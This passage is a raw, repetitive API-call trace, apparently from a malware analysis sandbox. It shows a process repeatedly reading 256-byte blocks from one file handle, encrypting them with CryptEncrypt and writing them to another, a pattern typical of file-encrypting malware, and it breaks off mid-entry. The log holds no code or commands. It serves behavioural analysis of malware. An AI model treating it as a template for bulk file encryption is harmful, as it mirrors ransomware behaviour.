[0153.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.273] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.273] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.273] GetLastError () returned 0x0 [0153.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.274] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.274] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.274] GetLastError () returned 0x0 [0153.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.274] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.274] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.274] GetLastError () returned 0x0 [0153.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.274] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.274] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.274] GetLastError () returned 0x0 [0153.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.274] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.274] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.274] GetLastError () returned 0x0 [0153.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.274] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.274] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.274] GetLastError () returned 0x0 [0153.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.274] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.274] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.274] GetLastError () returned 0x0 [0153.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.274] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.275] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.275] GetLastError () returned 0x0 [0153.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.275] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.275] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.275] GetLastError () returned 0x0 [0153.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.275] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.275] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.275] GetLastError () returned 0x0 [0153.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.275] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.275] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.275] GetLastError () returned 0x0 [0153.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.275] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.275] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.275] GetLastError () returned 0x0 [0153.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.275] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.275] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.275] GetLastError () returned 0x0 [0153.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.275] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.275] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.276] GetLastError () returned 0x0 [0153.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.276] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.276] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.276] GetLastError () returned 0x0 [0153.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.276] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.276] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.276] GetLastError () returned 0x0 [0153.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.276] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.276] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.276] GetLastError () returned 0x0 [0153.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.276] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.276] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.276] GetLastError () returned 0x0 [0153.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.276] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.276] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.276] GetLastError () returned 0x0 [0153.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.276] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.276] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.276] GetLastError () returned 0x0 [0153.276] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.277] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.277] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.277] GetLastError () returned 0x0 [0153.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.277] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.277] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.277] GetLastError () returned 0x0 [0153.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.277] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.277] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.277] GetLastError () returned 0x0 [0153.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.277] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.277] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.277] GetLastError () returned 0x0 [0153.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.277] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.277] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.277] GetLastError () returned 0x0 [0153.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.277] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.277] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.277] GetLastError () returned 0x0 [0153.277] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.277] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.278] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.278] GetLastError () returned 0x0 [0153.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.278] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.278] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.278] GetLastError () returned 0x0 [0153.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.278] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.278] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.278] GetLastError () returned 0x0 [0153.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.278] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.278] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.278] GetLastError () returned 0x0 [0153.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.278] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.278] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.278] GetLastError () returned 0x0 [0153.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.278] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.278] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.278] GetLastError () returned 0x0 [0153.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 